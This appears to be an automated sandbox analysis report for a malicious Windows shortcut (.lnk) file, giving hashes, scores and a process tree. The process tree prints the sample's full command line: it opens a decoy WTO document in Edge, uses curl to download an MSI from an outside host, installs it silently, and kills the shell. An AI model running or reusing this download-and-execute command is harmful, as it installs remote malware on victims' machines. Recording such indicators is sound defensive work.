Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02-02-2025 16:00
Static task
static1
Behavioral task
behavioral1
Sample
d3689eceb2951bd5a9a62c1aa259b7b9.lnk
Resource
win7-20240903-en
windows7-x64
2 signatures
150 seconds
Behavioral task
behavioral2
Sample
d3689eceb2951bd5a9a62c1aa259b7b9.lnk
Resource
win10v2004-20241007-en
windows10-2004-x64
24 signatures
150 seconds
General
-
Target
d3689eceb2951bd5a9a62c1aa259b7b9.lnk
-
Size
3KB
-
MD5
d3689eceb2951bd5a9a62c1aa259b7b9
-
SHA1
6f9eb37cf0afacbc8211412aedc81c460c6fa4cf
-
SHA256
68f47a7e0f69a946019a113635c5b55ec78abb0e8108ac1e285b7568093e4e50
-
SHA512
253130444a06cb9a23577001044c13e4c6fb32d1c5a92e8875b5ff50be009b07f61ce1226c0d1b21fc603e44270e3422990fcb814afd6cdb7422139697f61752
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2816 wrote to memory of 2576 2816 cmd.exe 31 PID 2816 wrote to memory of 2576 2816 cmd.exe 31 PID 2816 wrote to memory of 2576 2816 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\d3689eceb2951bd5a9a62c1aa259b7b9.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start msedge https://www.wto.org/english/docs_e/legal_e/27-trips.pdf & curl -sLo C:\Users\Admin\AppData\Local\Temp\5010f4b0-d946-4df7-998c-9d43d2b022ab.msi http://hq-office.us/fork/setup315.msi & C:\Users\Admin\AppData\Local\Temp\5010f4b0-d946-4df7-998c-9d43d2b022ab.msi /qn | Taskkill /f /im cmd.exe2⤵PID:2576
-